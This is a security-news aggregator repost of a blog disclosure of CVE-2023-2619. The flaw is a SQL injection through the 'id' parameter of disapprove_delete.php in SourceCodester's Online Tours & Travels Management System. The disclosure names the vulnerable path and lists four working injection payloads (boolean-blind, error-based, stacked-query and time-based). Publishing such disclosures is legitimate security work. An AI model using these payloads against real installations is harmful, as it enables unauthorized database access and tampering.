Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2023-2619: SourceCodester Online Tours & Travels Management System disapprove_delete.php sql injection_@sec的博客-CSDN博客

A vulnerability, which was classified as critical, was found in SourceCodester Online Tours & Travels Management System 1.0. This affects the function exec of the file disapprove_delete.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-228549 was assigned to this vulnerability.

CVE
Open in Source
#sql#vulnerability#php#sap

@sec 于 2023-05-10 11:19:51 发布 15 收藏

版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

SourceCodester Online Tours & Travels Management System disapprove_delete.php sql injection

url: admin/operations/disapprove_delete.php

Abstract:

Line 19 of disapprove_delete.php invokes a SQL query built with input that comes from an untrusted source. This call could allow an attacker to modify the statement’s meaning or to execute arbitrary SQL commands.

Explanation:

SQL injection errors occur when:

  1. Data enters a program from an untrusted source.

  2. The data is used to dynamically construct a SQL query.

In this case, the data is passed to exec() in disapprove_delete.php on line 19.

Parameter: id (GET)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: id=111' RLIKE (SELECT (CASE WHEN (3201=3201) THEN 111 ELSE 0x28 END))-- WIlF

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: id=111' AND GTID_SUBSET(CONCAT(0x7176707671,(SELECT (ELT(3301=3301,1))),0x7162787171),3301)-- HkdP

    Type: stacked queries
    Title: MySQL >= 5.0.12 stacked queries (comment)
    Payload: id=111';SELECT SLEEP(5)#

    Type: time-based blind
    Title: MySQL > 5.0.12 AND time-based blind (heavy query)
    Payload: id=111' AND 8307=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1)-- RUFJ

Download Code:
https://www.sourcecodester.com/php/14510/online-tours-travels-management-system-project-using-php-and-mysql.html

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE